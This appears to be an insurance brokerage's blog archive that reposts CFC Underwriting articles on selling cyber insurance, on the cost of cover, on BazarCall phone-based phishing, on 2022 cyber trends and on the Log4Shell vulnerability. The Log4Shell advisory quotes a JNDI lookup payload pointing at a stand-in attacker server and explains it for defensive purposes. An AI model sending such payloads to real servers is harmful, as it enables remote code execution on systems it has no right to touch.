1-888-643-2217 Email ABEX
Keeping you updated

Category Archives: Cyber Risk Management

Six Things Successful Cyber Brokers Know

The case for cyber insurance gets stronger by the day, as cyber incidents grow in cost, cyber attacks become more frequent and cyber policies offer more innovative and effective services. But cyber is still a new market. Businesses often aren’t aware of their cyber risk or the role cyber insurance can play in protecting them. So how can you educate your customers about cyber?

CFC sat down with some of their top-performing cyber brokers to discover their secrets to success. Here are six things they say every broker selling cyber should know:

  1. How to explain cyber exposure simplySince lots of businesses are new to cyber, jumping straight into granular detail can feel unrelatable and unconvincing. Businesses don’t need to know the difference between the Cobalt Strike infection and the Log4Shell vulnerability. They care about how they’re at risk, the potential consequences of that risk and how they can prevent it. So stick to the basics and avoid unnecessary jargon.

    It helps to ask the right questions. What cyber security practices do you have in place? Do you consider data privacy? Have you been impacted by a cyber attack before? Your client’s answers will paint a picture of their cyber exposure, so they can understand their risk and how cyber insurance is here to help.

    And there’s nothing better than a strong statistic to back up your points—did you know 72% of businesses worldwide have been impacted by ransomware in 2023?

  2. Key factors that influence the priceCyber insurance provides great value for businesses big and small, but in many circles its cost is a topic of discussion. Those new to cyber may point to the price of cyber insurance coming close to more traditional lines, so it helps to know the three big factors that influence the cost:

    1.    Cyber incidents, particularly against SMBs, are the top business risk for the fifth year running
    2.    The average cost of a cyber claim is significant
    3.    Today’s cyber policies offer sophisticated technical services that would be too pricey for SMBs to get on their own

    Learn more about why cyber insurance is a great investment for any business, plus a breakdown of cyber incident costs, in this quick read.

  3. How to handle these top objections“I already invest in cyber security.”
    Cyber insurance provides a different service to cyber security, it’s not a question of either/or. Good policies will support the business’s internal IT team or external managed service provider with an expert incident response and business recovery team, while being there to cover financial loss if the worst happens.

    “Cyber attacks only affect big businesses.”
    While it’s attacks on household names that make the news, any business can find itself hit by a cybercriminal. And since smaller businesses tend to have less mature cyber security practices in place, cybercriminals often see them as the more attractive target.

    “We don’t collect sensitive data.”
    Two of the most common and costly cyber attacks we see are actually ransomware and funds transfer fraud, which aren’t necessarily aimed at stealing data. The cost to contain threats, repair networks and restore business operations—or to recover stolen funds—are the insured’s biggest worry. Thankfully, both types of incident are covered under CFC’s cyber policy.

    Use this checklist to find answers for more common objections.

  4. Security assessments don’t tell the full storyBusinesses often use third-party risk reports and vulnerability scans to evaluate their cyber risk. While these assessments give a good snapshot of network health at a specific time, IT environments can change any day. This means assessments don’t reveal much around the level of security across a network, potentially presenting a far more positive picture than is the case.

    Fully understanding when and how risk reports are beneficial will help your clients understand their risk and purchase the correct coverage. We explain risk reports in more depth here.

  5. Good policies offer proactive and reactive servicesCyber insurance doesn’t just cover financial loss when an incident occurs. A good policy offers proactive protection to stop attacks from happening in the first place, and reactive support to respond to the incident efficiently and effectively.

    From the moment a CFC cyber policy is bound, their global team of cyber experts works around the clock to detect and alert their customers to cyber threats targeting their business. If they discover a cyber security issue, their team notifies the impacted business though their Response app, and takes steps to remediate the threat before it escalates.

    The value these services offer to small businesses in particular might just be the greatest benefit a cyber policy can provide.

  6. The perfect analogy that shows the true value of cyberTaking out property insurance in case of a fire is seen as standard practice. Alarms and sprinklers can reduce fire damage, but they can’t remove the possibility of you facing a costly bill and business interruption. It’s the same principle for cyber.

    The most advanced cyber security available can still get caught out by a new vulnerability or threat. Without cover, the impacted business won’t receive support in their incident response and recovery, and it’ll bear the financial burden alone.

    CFC’s cyber policy is the full package. For a smoke alarm they offer proactive cyber attack prevention, for a sprinkler system the largest in-house team of incident responders in market. And at the end they cover any damage and loss of income, helping policyholders get back on their feet.

With today’s cyber policies broadening their cover and protection, and cyber risk escalating at an alarming rate, cyber insurance is set to play a bigger role than ever before. By helping your clients to understand their cyber risk- and how cyber insurance is such a gamechanger – you and CFC can help protect businesses and perhaps even turn the tide on cybercrime.

See how you can best speak to your clients about cyber risk and insurance in CFC’s on-demand webinar.

Source: www.cfcunderwriting.com


Does Cyber Insurance Cost Too Much?

We often hear that cost can make cyber insurance a non-starter for businesses. We get it; broad coverage comes at a price given the value of services provided with a policy these days.

So, CFC has listed below the 5 key reasons a cyber insurance policy, is worth the financial investment.

Cyber is a business’ largest exposure
We’re in a digital age and businesses no longer rely on paper trails and filing cabinets. This digital reliance has shifted a business’ assets from tangible to intangible, making them wildly accessible and opening even the smallest of businesses to a whole new era of risk.

Subsequently, most companies today state that cyber risk is in their top three, if not their number one business risk given their reliance on technology. Since the frequency of loss is that much greater for a cyber event than traditional perils, such as a fire – it makes sense that the cost of cyber insurance today will mirror a business’ largest exposure.

CFC has created a cyber risk heat map, which explains the varying levels by industry. Hint, nearly no business is safe!

Premiums are a fraction of the cost compared to a cyber claim
The price of cyber insurance may seem higher than expected given many still consider it a discretionary purchase, but when you compare the thousands, hundreds of thousands, or even millions in costs that cyberattacks can incur for business, it’s an easy decision to make.

And the severity of those claims continues to rise. According to the latest Coveware report, it’s been noted that fewer victims are paying ransomware demands, so threat actors are demanding more money to compensate for the lower hit rate, making individual claims more expensive.

This lower hit rate on ransomware has also meant hackers are pivoting back to previous attack techniques, with the likes of business email compromise attacks showing an increase of 147% across the second half of 2022 (for SME businesses).

A good cyber policy should offer proactive protection from attacks
At CFC, from the minute the policy is bound, their cyber security team works around the clock to protect businesses against cyber-attacks.

This is a proactive, protective service that identifies potential threats using insights from a variety of sources, including public and private threat intelligence feeds that go well beyond the usual outside-in scanning tools available to insurers. If a cyber security issue is found, their team will reach out through their Response app to work with a potentially compromised business, to eliminate the threat before it can cause harm.

To pay for this level of monitoring externally, a business would need multiple providers, all individually costing upwards of thousands every year. Whereas, all of this work is done for free, as part of the standalone CFC cyber policy, as well as expert incident response and recovery.

Expert incident response and recovery
One of the other critical elements of a cyber policy is the availability of in-house cyber incident response. At CFC, their team of cyber threat analysts, digital forensic specialists and incident responders, CFC Response, is available 24/7 to triage incidents, contain threats, and repair networks if a cyber incident occurs.

Cyber policies cover a lot
A good, stand-alone cyber policy, such as a CFC cyber policy, includes comprehensive coverage.

Many small businesses do not have access to enterprise-grade security teams, threat intelligence feeds that can inform them of whether they are listed on a threat actor’s target list, or access to a multi-disciplinary team of experts who know how to respond to cyber-attacks and compliment existing IT personnel.

Equally, should the worst happen, cyber insurance policies cover cyber incident response costs, including IT forensics, legal, breach notification and crisis communications to cybercrime costs that include social engineering, theft of personal funds and cyber extortion.

All told, this can cost anywhere from thousands to hundreds of thousands, and there is no limit to the range of support required during a cyber incident. CFC’s security team estimates that the average downtime following a ransomware attack can be up to 2-3 weeks, and that’s only with the expert assistance of a cyber incident response team provided by an insurer. With a broad policy, the insured can focus on getting their business back up and running, rather than worrying about what will and won’t be covered by their insurer.

It is estimated that that cyber-attacks will cost the globe $8 trillion dollars in 2023. Yet, we estimate, only less than 20% of businesses have taken out a cyber insurance policy as of today. Cyber insurers are not just there to step in after an attack has taken place, ready to pay the many external teams a business needed to pull in to recover.  Instead, coverage from a cyber insurer like CFC protects and prevents attacks on businesses from the minute they bind a policy.

Cyber insurance is not expensive, cyberattacks are. And with the right cyber insurance product, it should be the easiest purchase a business has ever made to cover its largest exposure.

Source: www.cfcunderwriting.com


Beware of “BazarCall” Ransomware Attack Method

The new attack method has been growing in use among well-known ransomware groups and was responsible for 10% of malware incidents last quarter.

What is it?

BazarCall is a new attack methodology, known as a T.O.A.D (telephone-oriented attack delivery), which utilizes a phishing email to trick the victim into phoning a call centre – rather than clicking a link – and instructs them to download malicious file which infects their computers. By doing so, the BazarCall attack subverts common cyber security controls and allows the hacker to carry out a ransomware attack undetected.

The phishing emails usually refer to a subscription, for instance an antivirus software, which the victim never requested. The phishing email falsely claims that the only way to cancel this fake subscription is to phone the call centre.

From there, the hacker verbally guides the victim through the process of downloading a malicious Excel file with macros and then enabling those macros, which in turn infects the computer with malware.

Why is it critical?

Because the BazarCall method doesn’t require the user to click a link (as you would expect in a normal phishing email) common cyber security tools like email security filters can’t detect it. The method also subverts security controls because the user is downloading the malware themselves, unlike some more typical cyber attacks where the hacker must first penetrate the network.

Workplace security awareness education about phishing emails and social engineering doesn’t often include warnings for telephone-oriented attacks, which makes this attack more lucrative for hackers and more challenging for businesses.

What has CFC seen?

In early 2022, CFC’s cyber threat analysis team, which is responsible for analyzing and responding to cyber threats on behalf of CFC’s cyber insurance clients, first observed an increase in adoption of this technique by a variety of well-known ransomware groups.

In response, CFC analyzed its cyber customer base and found that BazarCall accounted for 10% of successful malware infections detected across its cyber portfolio in the last three months.

However, by intervening quickly, to date CFC has detected and removed every case of this malware within its impacted customers, at no cost to them. This intervention can happen at three stages:

  • By identifying whether a specific victim has received the phishing email, but not called the phone number
  • Whether they’ve called the phone number within the email
  • Whether they’ve installed the malware

How to mitigate

In order to protect your business from such attacks it’s important you’re implementing the following:

  • Keep all software and firmware up to date: Every device needs antivirus software. If an employee downloads a malicious application like the one from Bazarcall, or if an application becomes infected, antivirus software along with modern, up-to-date firewalls will help to secure the device and remove the infection.
  • Implement multi-factor authentication (MFA) on all remote connections: MFA can help reduce the amount of lateral movement and privilege escalation hackers can achieve within your systems. Even if your password is in the hands of the criminal, it is unlikely they will have your other forms of verification too. For more on MFA best practices, read our cyber tips piece on multi-factor authentication.
  • Employee security awareness training: The majority of cyber attacks are the result of human error, particularly employees who inadvertently click on malicious links or fall victim to social engineering attacks like BazarCall. Carry out regular security awareness training with your employees and ensure it covers all types of social engineering attacks.

For other ways to keep your employees safe read our article, Staying Safe Online.

Source: www.cfcunderwriting.com


Cyber Trends Predicted for 2022

2021 was certainly a time of change for the cyber insurance market and it’s looking like 2022 will be no different.

The cyber threat landscape over the last year has proven to be the most volatile yet in the history of the market, for the simple reason that the risk is too low and the profitability too high for threat actors. As a result, cyber insurers have had to evolve just as quickly to prevent and respond, leading to the following predictions for the year ahead:

Zero-day ransomware attacks
Zero-day ransomware attacks will dominate the headlines, whereby criminals exploit software vulnerabilities before any patches are available to avoid them by businesses. This means that the only way to prevent an attack is through improved security controls in advance.

Fear of a systemic risk event
Third party dependencies will continue to be a weak link for cyber risk. Managed service providers and cloud computing providers will continue to be lucrative targets for cybercriminals, with the fear of the next large-scale systemic risk event – where a single event has the potential to impact thousands of businesses – at the forefront of everyone’s mind.

Cyber insurance = risk management service
Cyber insurance will predominantly become a proactive risk management service. Insurers will seek to prevent claims before they happen and will pivot to conducting scans to detect vulnerabilities as an added service through mobile app technology.

Increased regulatory and governmental scrutiny
Increased scrutiny by both regulators and government advisory groups with a focus on improving security standards for businesses to prevent attacks. Equally, government bodies will seek to ensure there is more transparency around when businesses decide to pay ransom demands through legislation.

Targeting manufacturers and distributors
Criminals will continue to target businesses in industries where standards for security have historically been weak. Manufacturers and distributors have been particularly impacted in the last year given dependencies on automation, robotics, and the supply chain as entryways in their networks.

Continual hardening of the market
As a result, the cyber market is expected to continue to harden with more corrective action taken on rates to ensure the coverage can be maintained as broadly as it has been. Cyber will move from ‘hard to sell’ to ‘hard to buy’ based on limited available capacity, and undoubtedly become where a company’s largest exposure now lies.

So, that’s what CFC thinks will be the most prominent trends hitting the cyber insurance market throughout 2022, but what do you think?

 

Source: www.cfcunderwriting.com


Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from how log messages are being handled by the processor in log4j2, an open-source logging service provided by the Apache Group that provides logging for numerous projects. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but in doing so it queries the malicious server. The malicious server will then respond with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server downloads this response and executes the code included in the response.

Some of the products known to be using this, and therefore vulnerable to the vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Ghidra
Grails
Minecraft
Apache Tomcat
Dropwizard
Elastic Kibana
Hibernate
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate against this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you also should determine if Log4j is installed elsewhere. Java applications can include all the dependent libraries within their installation. To do this, you should undertake a file system search for log4j, searching inside EAR, JAR and WAR files e.g.:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service through the use of an argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:

JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true

Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com

 


Blog

FOLLOW OUR BLOG

Receive notifications of new posts automatically.



ABEX - AFFILIATED BROKERS EXCHANGE IS ON FACEBOOK.

Like us on Facebook

Connect with us on LinkedIn